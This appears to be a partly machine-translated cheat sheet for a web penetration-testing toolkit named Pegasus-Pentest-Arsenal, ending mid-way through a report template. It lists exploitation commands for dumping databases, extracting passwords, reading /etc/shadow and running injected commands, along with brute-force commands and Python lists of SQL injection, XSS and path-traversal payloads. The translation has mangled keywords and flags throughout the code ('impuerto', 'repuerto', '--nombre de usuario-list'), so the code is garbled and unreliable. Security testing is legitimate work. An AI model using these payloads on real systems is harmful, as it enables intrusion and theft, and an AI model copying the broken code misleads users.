Pegasus-Pentest-Arsenal hoja de trucos
Overview
Pegasus-Pentest-Arsenal is a comprehensive web security testing toolkit designed to streamline and automate various aspects of aplicación web pruebas de penetración. Developed as an all-in-one solution for security professionals, this arsenal combines multiple security testing tools and methodologies into a unified platform that simplifies the proceso of identifying and exploiting aplicación web vulnerabilities. The toolkit is particularly valuable for penetration testers who need to quickly assess aplicación webs across different technologies and frameworks.
The arsenal distinguishes itself through its modular architecture and extensive automation capabilities. Rather than requiring security professionals to manually configure and execute dozens of different tools, Pegasus-Pentest-Arsenal provides a streamlined interface that orchestrates various security testing activities. The platform includes automated reconocimiento, vulnerabilidad scanning, exploitation modules, and repuertoing capabilities, making it suitable for both quick security assessments and comprehensive pruebas de penetración engagements.
The toolkit incorporates industry-standard security testing methodologies and integrates with popular security tools to provide comprehensive coverage of aplicación web attack vectors. It suppuertos testing for OWASP Top 10 vulnerabilities, advanced injection attacks, autenticación bypasses, sesión management flaws, and business logic vulnerabilities. The platform's automation capabilities significantly reduce the time required for routine testing tasks while maintaining the thoroughness required for professional security assessments.
Pegasus-Pentest-Arsenal is designed with both novice and experienced penetration testers in mind. The platform provides guided workflows for beginners while offering advanced customization opcións for experienced professionals. Its repuertoing capabilities generate professional-grade documentación suitable for client deliverables, compliance requirements, and internal security assessments.
instalación
Docker instalación (Recommended)
# Clone Pegasus-Pentest-Arsenal repository
git clone https://github.com/pegasus-arsenal/pegasus-pentest-arsenal.git
cd pegasus-pentest-arsenal
# Build Docker image
docker build -t pegasus-arsenal .
# Run Pegasus Arsenal container
docker run -d -p 8080:8080 -p 8443:8443 --name pegasus-arsenal pegasus-arsenal
# Run with persistent data
docker run -d -p 8080:8080 -p 8443:8443 \
-v pegasus_data:/app/data \
-v pegasus_repuertos:/app/repuertos \
--name pegasus-arsenal pegasus-arsenal
# Access Pegasus Arsenal
# Web interface: http://localhost:8080
# HTTPS interface: https://localhost:8443
# Stop container
docker stop pegasus-arsenal
# Remove container
docker rm pegasus-arsenal
Docker Compose instalación
# Create docker-compose.yml
cat << 'EOF' > docker-compose.yml
version: '3.8'
servicios:
pegasus-arsenal:
build: .
container_name: pegasus-arsenal
puertos:
- "8080: 8080"
- "8443: 8443"
- "1337: 1337" # Additional servicio puerto
volumes:
- pegasus_data: /app/data
- pegasus_repuertos: /app/repuertos
- pegasus_wordlists: /app/wordlists
- ./custom_modules: /app/custom_modules
environment:
- PEGASUS_MODE=production
- PEGASUS_DEBUG=false
- PEGASUS_API_clave=your_api_clave_here
restart: unless-stopped
networks:
- pegasus_network
pegasus-db:
image: postgres:13
container_name: pegasus-db
environment:
- POSTGRES_DB=pegasus
- POSTGRES_USER=pegasus
- POSTGRES_contraseña=pegasus_contraseña
volumes:
- pegasus_db_data: /var/lib/postgresql/data
networks:
- pegasus_network
volumes:
pegasus_data:
pegasus_repuertos:
pegasus_wordlists:
pegasus_db_data:
networks:
pegasus_network:
driver: bridge
EOF
# Start Pegasus Arsenal
docker-compose up -d
# View logs
docker-compose logs -f pegasus-arsenal
# Stop servicios
docker-compose down
# Stop and remove volumes
docker-compose down -v
Manual instalación on Ubuntu/Debian
# Update system
sudo apt update && sudo apt upgrade -y
# Install dependencies
sudo apt install -y python3 python3-pip python3-venv git curl wget \
nmap sqlmap nikto dirb gobuster wfuzz hydra john \
metasploit-framework burpsuite zaproxy
# Install Node.js and npm
curl -fsSL https://deb.nodesource.com/setup_16.x|sudo -E bash -
sudo apt install -y nodejs
# Clone repository
git clone https://github.com/pegasus-arsenal/pegasus-pentest-arsenal.git
cd pegasus-pentest-arsenal
# Create virtual environment
python3 -m venv venv
source venv/bin/activate
# Install Python dependencies
pip install -r requirements.txt
# Install Node.js dependencies
npm install
# Configure database
sudo apt install postgresql postgresql-contrib
sudo -u postgres createdb pegasus
sudo -u postgres createuser pegasus
sudo -u postgres psql -c "ALTER USER pegasus contraseña 'pegasus_contraseña';"
# Initialize database
python3 manage.py migrate
# Create superuser
python3 manage.py createsuperuser
# Start Pegasus Arsenal
python3 manage.py runserver 0.0.0.0:8080
instalación on CentOS/RHEL
# Install EPEL repository
sudo yum install epel-release -y
# Install dependencies
sudo yum groupinstall "Development Tools" -y
sudo yum install python3 python3-pip git curl wget \
nmap sqlmap nikto dirb hydra john -y
# Install additional security tools
sudo yum install snapd -y
sudo systemctl enable --now snapd.socket
sudo snap install burpsuite-community-edition
# Clone and setup
git clone https://github.com/pegasus-arsenal/pegasus-pentest-arsenal.git
cd pegasus-pentest-arsenal
# Setup Python environment
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
# Install PostgreSQL
sudo yum install postgresql postgresql-server postgresql-contrib -y
sudo postgresql-setup initdb
sudo systemctl start postgresql
sudo systemctl enable postgresql
# Configure database
sudo -u postgres createdb pegasus
sudo -u postgres createuser pegasus
sudo -u postgres psql -c "ALTER USER pegasus contraseña 'pegasus_contraseña';"
# Start application
python3 manage.py runserver 0.0.0.0:8080
Kubernetes Deployment
# Create pegasus-deployment.yaml
cat << 'EOF' > pegasus-deployment.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: pegasus-arsenal
labels:
app: pegasus-arsenal
spec:
replicas: 2
selector:
matchLabels:
app: pegasus-arsenal
template:
metadata:
labels:
app: pegasus-arsenal
spec:
containers:
- name: pegasus-arsenal
image: pegasus-arsenal:latest
puertos:
- containerpuerto: 8080
- containerpuerto: 8443
env:
- name: PEGASUS_MODE
value: "production"
- name: DATABASE_URL
value: "postgresql://pegasus:contraseña@pegasus-db:5432/pegasus"
volumeMounts:
- name: pegasus-data
mountPath: /app/data
- name: pegasus-repuertos
mountPath: /app/repuertos
volumes:
- name: pegasus-data
persistentVolumeClaim:
claimName: pegasus-data-pvc
- name: pegasus-repuertos
persistentVolumeClaim:
claimName: pegasus-repuertos-pvc
---
apiVersion: v1
kind: servicio
metadata:
name: pegasus-arsenal-servicio
spec:
selector:
app: pegasus-arsenal
puertos:
- name: http
puerto: 8080
objetivopuerto: 8080
- name: https
puerto: 8443
objetivopuerto: 8443
type: LoadBalancer
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: pegasus-db
spec:
replicas: 1
selector:
matchLabels:
app: pegasus-db
template:
metadata:
labels:
app: pegasus-db
spec:
containers:
- name: postgres
image: postgres:13
env:
- name: POSTGRES_DB
value: "pegasus"
- name: POSTGRES_USER
value: "pegasus"
- name: POSTGRES_contraseña
value: "contraseña"
volumeMounts:
- name: postgres-data
mountPath: /var/lib/postgresql/data
volumes:
- name: postgres-data
persistentVolumeClaim:
claimName: postgres-data-pvc
---
apiVersion: v1
kind: servicio
metadata:
name: pegasus-db
spec:
selector:
app: pegasus-db
puertos:
- puerto: 5432
objetivopuerto: 5432
EOF
# Deploy to Kubernetes
kubectl apply -f pegasus-deployment.yaml
# Check deployment status
kubectl get pods
kubectl get servicios
# Access Pegasus Arsenal
kubectl puerto-forward servicio/pegasus-arsenal-servicio 8080: 8080
Initial configuración
First-Time Setup
# Access Pegasus Arsenal web interface
# Navigate to http://localhost:8080
# Initial configuración wizard
# 1. Set admin credenciales
# 2. Configure database conexión
# 3. Set API claves for external servicios
# 4. Configure tool paths
# 5. Set up repuertoing preferencias
# comando-line configuración
python3 manage.py configure --interactive
# Non-interactive configuración
python3 manage.py configure \
--admin-user admin \
--admin-contraseña secure_contraseña \
--database-url postgresql://pegasus:contraseña@localhost:5432/pegasus \
--api-claves-file api_claves.json
API claves configuración
# Create API claves configuración file
cat << 'EOF' > api_claves.json
\\\\{
"virustotal": "your_virustotal_api_clave",
"shodan": "your_shodan_api_clave",
"censys": "your_censys_api_clave",
"securitytrails": "your_securitytrails_api_clave",
"hunter": "your_hunter_api_clave",
"dehashed": "your_dehashed_api_clave",
"hibp": "your_hibp_api_clave",
"whoisxml": "your_whoisxml_api_clave"
\\\\}
EOF
# Load API claves
python3 manage.py load_api_claves --file api_claves.json
# Test API connectivity
python3 manage.py test_apis
# Update individual API clave
python3 manage.py set_api_clave --servicio virustotal --clave your_new_clave
Tool configuración
# Configure external tool paths
cat << 'EOF' > tool_config.json
\\\\{
"nmap": "/usr/bin/nmap",
"sqlmap": "/usr/bin/sqlmap",
"nikto": "/usr/bin/nikto",
"dirb": "/usr/bin/dirb",
"gobuster": "/usr/bin/gobuster",
"wfuzz": "/usr/bin/wfuzz",
"hydra": "/usr/bin/hydra",
"john": "/usr/bin/john",
"hashcat": "/usr/bin/hashcat",
"metasploit": "/usr/bin/msfconsole",
"burpsuite": "/usr/bin/burpsuite",
"zaproxy": "/usr/bin/zaproxy"
\\\\}
EOF
# Load tool configuración
python3 manage.py configure_tools --file tool_config.json
# Verify tool instalación
python3 manage.py verify_tools
# Update tool paths
python3 manage.py update_tool_path --tool nmap --path /opt/nmap/bin/nmap
Core Modules and Features
reconocimiento Module
# Passive reconocimiento
pegasus-cli recon passive --objetivo ejemplo.com
# Active reconocimiento
pegasus-cli recon active --objetivo ejemplo.com --deep
# Subdomain enumeración
pegasus-cli recon subdomains --objetivo ejemplo.com \
--wordlist /app/wordlists/subdomains.txt \
--dns-bruteforce \
--certificado-transparency
# escaneo de puertos
pegasus-cli recon puertos --objetivo ejemplo.com \
--puertos 1-65535 \
--servicio-detection \
--os-detection
# Technology stack identification
pegasus-cli recon tech --objetivo ejemplo.com \
--huella digital-cms \
--identify-frameworks \
--detect-waf
# OSINT gathering
pegasus-cli recon osint --objetivo ejemplo.com \
--social-media \
--email-harvesting \
--leaked-credenciales
vulnerabilidad Scanning Module
# Comprehensive vulnerabilidad scan
pegasus-cli scan vuln --objetivo http://ejemplo.com \
--scan-type comprehensive \
--include-owasp-top10
# Specific vulnerabilidad types
pegasus-cli scan vuln --objetivo http://ejemplo.com \
--scan-types sqli,xss,csrf,lfi,rfi
# Authenticated scanning
pegasus-cli scan vuln --objetivo http://ejemplo.com \
--auth-type form \
--nombre de usuario admin \
--contraseña contraseña \
--login-url /login
# API vulnerabilidad scanning
pegasus-cli scan api --objetivo http://api.ejemplo.com \
--swagger-url /swagger.json \
--test-autenticación \
--test-autorización
# SSL/TLS security assessment
pegasus-cli scan ssl --objetivo ejemplo.com \
--check-certificados \
--test-ciphers \
--check-vulnerabilities
# aplicación web firewall detection
pegasus-cli scan waf --objetivo http://ejemplo.com \
--detection-methods all \
--bypass-attempts
exploitation Module
# inyección SQL exploitation
pegasus-cli exploit sqli --objetivo http://ejemplo.com/page.php?id=1 \
--technique union \
--dump-database \
--extract-contraseñas
# cross-site scripting (XSS) exploitation
pegasus-cli exploit xss --objetivo http://ejemplo.com/search \
--parámetro q \
--payload-type reflected \
--generate-poc
# File inclusion exploitation
pegasus-cli exploit lfi --objetivo http://ejemplo.com/page.php?file=index \
--technique traversal \
--extract-files /etc/passwd,/etc/shadow
# inyección de comandos exploitation
pegasus-cli exploit cmdi --objetivo http://ejemplo.com/ping.php \
--parámetro host \
--technique blind \
--execute-comandos
# autenticación bypass
pegasus-cli exploit auth --objetivo http://ejemplo.com/login \
--technique sqli \
--nombre de usuario-field user \
--contraseña-field pass
# sesión hijacking
pegasus-cli exploit sesión --objetivo http://ejemplo.com \
--technique prediction \
--cookie-name PHPSESSID
fuerza bruta Module
# Login fuerza bruta
pegasus-cli bruteforce login --objetivo http://ejemplo.com/login \
--nombre de usuario-list /app/wordlists/nombre de usuarios.txt \
--contraseña-list /app/wordlists/contraseñas.txt \
--hilos 10
# Directory fuerza bruta
pegasus-cli bruteforce dirs --objetivo http://ejemplo.com \
--wordlist /app/wordlists/directories.txt \
--extensions php,asp,aspx,jsp \
--recursive
# Subdomain fuerza bruta
pegasus-cli bruteforce subdomains --objetivo ejemplo.com \
--wordlist /app/wordlists/subdomains.txt \
--resolver 8.8.8.8 \
--hilos 50
# parámetro fuerza bruta
pegasus-cli bruteforce params --objetivo http://ejemplo.com/page.php \
--wordlist /app/wordlists/parámetros.txt \
--method GET,POST
# cracking de hash
pegasus-cli bruteforce hash --hash-file hashes.txt \
--hash-type md5 \
--wordlist /app/wordlists/rockyou.txt \
--rules best64
# SSH fuerza bruta
pegasus-cli bruteforce ssh --objetivo 192.168.1.100 \
--nombre de usuario-list users.txt \
--contraseña-list contraseñas.txt \
--hilos 5
Advanced Testing Techniques
Custom payload Development
#!/usr/bin/env python3
# Custom payload generator for Pegasus Arsenal
impuerto json
impuerto base64
from urllib.parse impuerto quote
class PegasuspayloadGenerator:
def __init__(self):
self.payloads = \\\\{
'sqli': [],
'xss': [],
'lfi': [],
'cmdi': [],
'xxe': []
\\\\}
def generate_sqli_payloads(self, objetivo_db='mysql'):
"""Generate inyección SQL payloads"""
base_payloads = [
"' OR '1'='1",
"' OR 1=1 --",
"' UNION SELECT null, version() --",
"' AND (SELECT COUNT(*) FROM information_schema.tables)>0 --"
]
if objetivo_db == 'mysql':
base_payloads.extend([
"' UNION SELECT user(), database() --",
"' AND (SELECT SUBSTRING(@@version,1,1))='5' --"
])
elif objetivo_db == 'postgresql':
base_payloads.extend([
"' UNION SELECT current_user, current_database() --",
"' AND (SELECT version()) LIKE '%PostgreSQL%' --"
])
self.payloads['sqli'] = base_payloads
return base_payloads
def generate_xss_payloads(self, context='html'):
"""Generate XSS payloads for different contexts"""
html_payloads = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"<svg onload=alert('XSS')>",
"<iframe src=javascript:alert('XSS')>"
]
js_payloads = [
"';alert('XSS');//",
"\";alert('XSS');//",
"'-alert('XSS')-'",
"\"-alert('XSS')-\""
]
attr_payloads = [
"\" onmouseover=alert('XSS') \"",
"' onmouseover=alert('XSS') '",
"javascript:alert('XSS')"
]
if context == 'html':
self.payloads['xss'] = html_payloads
elif context == 'javascript':
self.payloads['xss'] = js_payloads
elif context == 'attribute':
self.payloads['xss'] = attr_payloads
else:
self.payloads['xss'] = html_payloads + js_payloads + attr_payloads
return self.payloads['xss']
def generate_lfi_payloads(self, os_type='linux'):
"""Generate Local File Inclusion payloads"""
linux_payloads = [
"../../../etc/passwd",
"....//....//....//etc/passwd",
"..%252f..%252f..%252fetc%252fpasswd",
"/etc/passwd%00",
"php://filter/convert.base64-encode/resource=../../../etc/passwd"
]
windows_payloads = [
"..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
"....\\\\....\\\\....\\\\windows\\\\win.ini",
"..%255c..%255c..%255cwindows%255cwin.ini",
"C:\\windows\\win.ini%00"
]
if os_type == 'linux':
self.payloads['lfi'] = linux_payloads
elif os_type == 'windows':
self.payloads['lfi'] = windows_payloads
else:
self.payloads['lfi'] = linux_payloads + windows_payloads
return self.payloads['lfi']
def encode_payloads(self, payloads, encoding='url'):
"""Encode payloads for bypass attempts"""
encoded = []
for payload in payloads:
if encoding == 'url':
encoded.append(quote(payload))
elif encoding == 'base64':
encoded.append(base64.b64encode(payload.encode()).decode())
elif encoding == 'html':
encoded.append(''.join(f'&#\\\\{ord(c)\\\\};' for c in payload))
return encoded
def expuerto_payloads(self, filename='custom_payloads.json'):
"""Expuerto payloads to JSON file"""
with open(filename, 'w') as f:
json.dump(self.payloads, f, indent=2)
print(f"payloads expuertoed to \\\\{filename\\\\}")
# uso ejemplo
if __name__ == "__main__":
generator = PegasuspayloadGenerator()
# Generate payloads
sqli_payloads = generator.generate_sqli_payloads('mysql')
xss_payloads = generator.generate_xss_payloads('html')
lfi_payloads = generator.generate_lfi_payloads('linux')
# Encode for bypass
encoded_sqli = generator.encode_payloads(sqli_payloads, 'url')
# Expuerto all payloads
generator.expuerto_payloads()
Automated Testing Workflows
#!/bin/bash
# Pegasus Arsenal automated testing workflow
objetivo="$1"
OUTPUT_DIR="pegasus_results_$(date +%Y%m%d_%H%M%S)"
if [ -z "$objetivo" ]; then
echo "uso: $0 <objetivo>"
exit 1
fi
echo "[*] Starting Pegasus Arsenal automated testing for $objetivo"
mkdir -p "$OUTPUT_DIR"
# Phase 1: reconocimiento
echo "[*] Phase 1: reconocimiento"
pegasus-cli recon passive --objetivo "$objetivo" --output "$OUTPUT_DIR/recon_passive.json"
pegasus-cli recon active --objetivo "$objetivo" --output "$OUTPUT_DIR/recon_active.json"
pegasus-cli recon subdomains --objetivo "$objetivo" --output "$OUTPUT_DIR/subdomains.json"
# Phase 2: escaneo de puertos
echo "[*] Phase 2: escaneo de puertos"
pegasus-cli recon puertos --objetivo "$objetivo" --puertos 1-65535 --output "$OUTPUT_DIR/puertos.json"
# Phase 3: Technology Detection
echo "[*] Phase 3: Technology Detection"
pegasus-cli recon tech --objetivo "$objetivo" --output "$OUTPUT_DIR/technology.json"
# Phase 4: vulnerabilidad Scanning
echo "[*] Phase 4: vulnerabilidad Scanning"
pegasus-cli scan vuln --objetivo "http://$objetivo" --scan-type comprehensive --output "$OUTPUT_DIR/vulnerabilities.json"
# Phase 5: SSL/TLS Assessment
echo "[*] Phase 5: SSL/TLS Assessment"
pegasus-cli scan ssl --objetivo "$objetivo" --output "$OUTPUT_DIR/ssl_assessment.json"
# Phase 6: Directory fuerza bruta
echo "[*] Phase 6: Directory fuerza bruta"
pegasus-cli bruteforce dirs --objetivo "http://$objetivo" --output "$OUTPUT_DIR/directories.json"
# Phase 7: exploitation (if vulnerabilities found)
echo "[*] Phase 7: exploitation"
if grep -q "sql_injection" "$OUTPUT_DIR/vulnerabilities.json"; then
pegasus-cli exploit sqli --objetivo "http://$objetivo" --auto-detect --output "$OUTPUT_DIR/sqli_exploitation.json"
fi
if grep -q "xss" "$OUTPUT_DIR/vulnerabilities.json"; then
pegasus-cli exploit xss --objetivo "http://$objetivo" --auto-detect --output "$OUTPUT_DIR/xss_exploitation.json"
fi
# Phase 8: Repuerto Generation
echo "[*] Phase 8: Repuerto Generation"
pegasus-cli repuerto generate --input-dir "$OUTPUT_DIR" --format html --output "$OUTPUT_DIR/final_repuerto.html"
pegasus-cli repuerto generate --input-dir "$OUTPUT_DIR" --format pdf --output "$OUTPUT_DIR/final_repuerto.pdf"
echo "[*] Testing complete. Results saved to $OUTPUT_DIR"
echo "[*] Open $OUTPUT_DIR/final_repuerto.html to view the results"
Custom Module Development
#!/usr/bin/env python3
# Custom Pegasus Arsenal module template
from pegasus.core.module impuerto BaseModule
from pegasus.core.logger impuerto get_logger
impuerto requests
impuerto json
class CustomWebTestModule(BaseModule):
"""Custom aplicación web testing module"""
def __init__(self):
super().__init__()
self.name = "Custom Web Test"
self.Descripción = "Custom aplicación web security testing module"
self.version = "1.0.0"
self.author = "Security Researcher"
self.logger = get_logger(__name__)
# Module opcións
self.opcións = \\\\{
'objetivo': \\\\{
'Descripción': 'objetivo URL',
'required': True,
'default': ''
\\\\},
'timeout': \\\\{
'Descripción': 'Request timeout in seconds',
'required': False,
'default': 10
\\\\},
'user_agent': \\\\{
'Descripción': 'Custom User-Agent string',
'required': False,
'default': 'Pegasus-Arsenal/1.0'
\\\\}
\\\\}
def validate_opcións(self):
"""Validate module opcións"""
if not self.opcións['objetivo']['value']:
raise ValueError("objetivo URL is required")
if not self.opcións['objetivo']['value'].startswith(('http://', 'https://')):
raise ValueError("objetivo must be a valid HTTP/HTTPS URL")
def run(self):
"""Execute the module"""
self.logger.info(f"Starting custom web test for \\\\{self.opcións['objetivo']['value']\\\\}")
try:
self.validate_opcións()
# Custom testing logic
results = self.perform_custom_tests()
# proceso and return results
return self.format_results(results)
except Exception as e:
self.logger.error(f"Module execution failed: \\\\{e\\\\}")
return \\\\{'error': str(e)\\\\}
def perform_custom_tests(self):
"""Perform custom security tests"""
objetivo = self.opcións['objetivo']['value']
timeout = int(self.opcións['timeout']['value'])
user_agent = self.opcións['user_agent']['value']
headers = \\\\{'User-Agent': user_agent\\\\}
results = \\\\{
'objetivo': objetivo,
'tests': []
\\\\}
# Test 1: Check for sensitive files
sensitive_files = [
'/robots.txt',
'/.htaccess',
'/web.config',
'/backup.sql',
'/config.php.bak'
]
for file_path in sensitive_files:
test_url = objetivo.rstrip('/') + file_path
try:
response = requests.get(test_url, headers=headers, timeout=timeout)
test_result = \\\\{
'test_name': 'Sensitive File Check',
'url': test_url,
'status_code': response.status_code,
'vulnerable': response.status_code == 200,
'details': f"File \\\\{file_path\\\\} accessible" if response.status_code == 200 else None
\\\\}
results['tests'].append(test_result)
except requests.RequestException as e:
self.logger.warning(f"Request failed for \\\\{test_url\\\\}: \\\\{e\\\\}")
# Test 2: Check for common vulnerabilities
vuln_tests = [
\\\\{
'name': 'XSS Test',
'payload': '<script>alert("XSS")</script>',
'parámetro': 'q'
\\\\},
\\\\{
'name': 'inyección SQL Test',
'payload': "' OR '1'='1",
'parámetro': 'id'
\\\\}
]
for test in vuln_tests:
test_url = f"\\\\{objetivo\\\\}?\\\\{test['parámetro']\\\\}=\\\\{test['payload']\\\\}"
try:
response = requests.get(test_url, headers=headers, timeout=timeout)
vulnerable = test['payload'] in response.text
test_result = \\\\{
'test_name': test['name'],
'url': test_url,
'vulnerable': vulnerable,
'payload': test['payload'],
'details': f"payload reflected in response" if vulnerable else None
\\\\}
results['tests'].append(test_result)
except requests.RequestException as e:
self.logger.warning(f"Request failed for \\\\{test_url\\\\}: \\\\{e\\\\}")
return results
def format_results(self, results):
"""Format results for output"""
formatted = \\\\{
'module': self.name,
'objetivo': results['objetivo'],
'timestamp': self.get_timestamp(),
'summary': \\\\{
'total_tests': len(results['tests']),
'vulnerabilities_found': sum(1 for test in results['tests'] if test.get('vulnerable', False))
\\\\},
'vulnerabilities': [test for test in results['tests'] if test.get('vulnerable', False)],
'all_tests': results['tests']
\\\\}
return formatted
# Register module with Pegasus Arsenal
def register_module():
return CustomWebTestModule()
Integration with Security Tools
Burp Suite Integration
#!/usr/bin/env python3
# Pegasus Arsenal - Burp Suite integration
impuerto requests
impuerto json
impuerto base64
class PegasusBurpIntegration:
def __init__(self, burp_api_url="http://localhost:1337", api_clave=None):
self.burp_api_url = burp_api_url
self.api_clave = api_clave
self.sesión = requests.sesión()
if api_clave:
self.sesión.headers.update(\\\\{'X-API-clave': api_clave\\\\})
def start_scan(self, objetivo_url, scan_type="crawl_and_audit"):
"""Start Burp Suite scan via API"""
scan_config = \\\\{
"scan_configuracións": [
\\\\{
"name": scan_type,
"type": "Namedconfiguración"
\\\\}
],
"urls": [objetivo_url]
\\\\}
response = self.sesión.post(
f"\\\\{self.burp_api_url\\\\}/v0.1/scan",
json=scan_config
)
if response.status_code == 201:
scan_id = response.headers.get('Location').split('/')[-1]
return scan_id
else:
raise Exception(f"Failed to start scan: \\\\{response.text\\\\}")
def get_scan_status(self, scan_id):
"""Get scan status"""
response = self.sesión.get(f"\\\\{self.burp_api_url\\\\}/v0.1/scan/\\\\{scan_id\\\\}")
if response.status_code == 200:
return response.json()
else:
raise Exception(f"Failed to get scan status: \\\\{response.text\\\\}")
def get_scan_issues(self, scan_id):
"""Get scan issues/vulnerabilities"""
response = self.sesión.get(f"\\\\{self.burp_api_url\\\\}/v0.1/scan/\\\\{scan_id\\\\}/issues")
if response.status_code == 200:
return response.json()
else:
raise Exception(f"Failed to get scan issues: \\\\{response.text\\\\}")
def expuerto_scan_repuerto(self, scan_id, repuerto_format="HTML"):
"""Expuerto scan repuerto"""
expuerto_config = \\\\{
"scan_id": scan_id,
"repuerto_type": repuerto_format
\\\\}
response = self.sesión.post(
f"\\\\{self.burp_api_url\\\\}/v0.1/scan/\\\\{scan_id\\\\}/repuerto",
json=expuerto_config
)
if response.status_code == 200:
return response.content
else:
raise Exception(f"Failed to expuerto repuerto: \\\\{response.text\\\\}")
# Integration with Pegasus Arsenal
def integrate_with_pegasus(objetivo_url):
"""Integrate Burp Suite scan with Pegasus Arsenal"""
burp = PegasusBurpIntegration()
# Start scan
scan_id = burp.start_scan(objetivo_url)
print(f"Started Burp Suite scan: \\\\{scan_id\\\\}")
# Monitor scan progress
while True:
status = burp.get_scan_status(scan_id)
if status['scan_status'] == 'succeeded':
print("Scan completed successfully")
break
elif status['scan_status'] == 'failed':
print("Scan failed")
break
else:
print(f"Scan in progress: \\\\{status['scan_metrics']['crawl_requests_made']\\\\} requests made")
time.sleep(30)
# Get issues
issues = burp.get_scan_issues(scan_id)
# Expuerto repuerto
repuerto = burp.expuerto_scan_repuerto(scan_id, "HTML")
with open(f"burp_repuerto_\\\\{scan_id\\\\}.html", "wb") as f:
f.write(repuerto)
return issues
OWASP ZAP Integration
#!/usr/bin/env python3
# Pegasus Arsenal - OWASP ZAP integration
from zapv2 impuerto ZAPv2
impuerto time
impuerto json
class PegasusZAPIntegration:
def __init__(self, zap_proxy="http://localhost:8080"):
self.zap = ZAPv2(proxies=\\\\{'http': zap_proxy, 'https': zap_proxy\\\\})
def spider_objetivo(self, objetivo_url):
"""Spider objetivo application"""
print(f"Starting spider scan for \\\\{objetivo_url\\\\}")
scan_id = self.zap.spider.scan(objetivo_url)
# Wait for spider to complete
while int(self.zap.spider.status(scan_id)) < 100:
print(f"Spider progress: \\\\{self.zap.spider.status(scan_id)\\\\}%")
time.sleep(5)
print("Spider scan completed")
return self.zap.spider.results(scan_id)
def active_scan(self, objetivo_url):
"""Perform active security scan"""
print(f"Starting active scan for \\\\{objetivo_url\\\\}")
scan_id = self.zap.ascan.scan(objetivo_url)
# Wait for active scan to complete
while int(self.zap.ascan.status(scan_id)) < 100:
print(f"Active scan progress: \\\\{self.zap.ascan.status(scan_id)\\\\}%")
time.sleep(10)
print("Active scan completed")
return scan_id
def get_alerts(self, baseurl=None):
"""Get security alerts"""
return self.zap.core.alerts(baseurl)
def generate_repuerto(self, format_type="HTML"):
"""Generate security repuerto"""
if format_type.upper() == "HTML":
return self.zap.core.htmlrepuerto()
elif format_type.upper() == "XML":
return self.zap.core.xmlrepuerto()
elif format_type.upper() == "JSON":
return self.zap.core.jsonrepuerto()
else:
raise ValueError("Unsuppuertoed repuerto format")
def comprehensive_scan(self, objetivo_url):
"""Perform comprehensive security assessment"""
results = \\\\{
'objetivo': objetivo_url,
'spider_results': [],
'alerts': [],
'scan_summary': \\\\{\\\\}
\\\\}
# Spider the application
spider_results = self.spider_objetivo(objetivo_url)
results['spider_results'] = spider_results
# Perform active scan
scan_id = self.active_scan(objetivo_url)
# Get alerts
alerts = self.get_alerts(objetivo_url)
results['alerts'] = alerts
# Generate summary
results['scan_summary'] = \\\\{
'total_urls_found': len(spider_results),
'total_alerts': len(alerts),
'high_risk_alerts': len([a for a in alerts if a['risk'] == 'High']),
'medium_risk_alerts': len([a for a in alerts if a['risk'] == 'Medium']),
'low_risk_alerts': len([a for a in alerts if a['risk'] == 'Low'])
\\\\}
return results
# Integration function
def run_zap_scan_for_pegasus(objetivo_url):
"""Run ZAP scan and integrate with Pegasus Arsenal"""
zap_integration = PegasusZAPIntegration()
# Perform comprehensive scan
results = zap_integration.comprehensive_scan(objetivo_url)
# Generate repuertos
html_repuerto = zap_integration.generate_repuerto("HTML")
json_repuerto = zap_integration.generate_repuerto("JSON")
# Save repuertos
with open(f"zap_repuerto_\\\\{objetivo_url.replace('://', '_').replace('/', '_')\\\\}.html", "w") as f:
f.write(html_repuerto)
with open(f"zap_results_\\\\{objetivo_url.replace('://', '_').replace('/', '_')\\\\}.json", "w") as f:
f.write(json_repuerto)
return results
Repuertoing and documentación
Automated Repuerto Generation
#!/usr/bin/env python3
# Pegasus Arsenal automated repuerto generator
impuerto json
impuerto datetime
from jinja2 impuerto Template
impuerto pdfkit
class PegasusRepuertoGenerator:
def __init__(self):
self.repuerto_data = \\\\{\\\\}
self.templates = \\\\{
'executive_summary': self.get_executive_template(),
'technical_details': self.get_technical_template(),
'recommendations': self.get_recommendations_template()
\\\\}
def load_scan_results(self, results_file):
"""Load scan results from JSON file"""
with open(results_file, 'r') as f:
self.repuerto_data = json.load(f)
def generate_executive_summary(self):
"""Generate executive summary"""
template = Template(self.templates['executive_summary'])
# Calculate risk metrics
total_vulns = len(self.repuerto_data.get('vulnerabilities', []))
high_risk = len([v for v in self.repuerto_data.get('vulnerabilities', []) if v.get('severity') == 'High'])
medium_risk = len([v for v in self.repuerto_data.get('vulnerabilities', []) if v.get('severity') == 'Medium'])
low_risk = len([v for v in self.repuerto_data.get('vulnerabilities', []) if v.get('severity') == 'Low'])
summary_data = \\\\{
'objetivo': self.repuerto_data.get('objetivo', 'Unknown'),
'scan_date': datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
'total_vulnerabilities': total_vulns,
'high_risk_count': high_risk,
'medium_risk_count': medium_risk,
'low_risk_count': low_risk,
'risk_score': self.calculate_risk_score(high_risk, medium_risk, low_risk)
\\\\}
return template.render(**summary_data)
def generate_technical_details(self):
"""Generate technical details section"""
template = Template(self.templates['technical_details'])
return template.render(
vulnerabilities=self.repuerto_data.get('vulnerabilities', []),
scan_details=self.repuerto_data.get('scan_details', \\\\{\\\\}),
objetivo_info=self.repuerto_data.get('objetivo_info', \\\\{\\\\})
)
def generate_recommendations(self):
"""Generate recommendations section"""
template = Template(self.templates['recommendations'])
# Generate recommendations based on vulnerabilities found
recommendations = self.generate_vuln_recommendations()
return template.render(recommendations=recommendations)
def generate_full_repuerto(self, output_format='html'):
"""Generate complete security assessment repuerto"""
repuerto_sections = \\\\{
'executive_summary': self.generate_executive_summary(),
'technical_details': self.generate_technical_details(),
'recommendations': self.generate_recommendations()
\\\\}
full_repuerto_template = """
<!DOCTYPE html>
<html>
<head>
<title>Pegasus Arsenal Security Assessment Repuerto</title>
<style>
body \\\\{ font-family: Arial, sans-serif; margin: 40px; \\\\}
.header \\\\{ text-align: center; border-bottom: 2px solid #333; padding-bottom: 20px; \\\\}
.section \\\\{ margin: 30px 0; \\\\}
.vulnerabilidad \\\\{ border: 1px solid #ddd; padding: 15px; margin: 10px 0; \\\\}
.high-risk \\\\{ border-left: 5px solid #d32f2f; \\\\}
.medium-risk \\\\{ border-left: 5px solid #f57c00; \\\\}
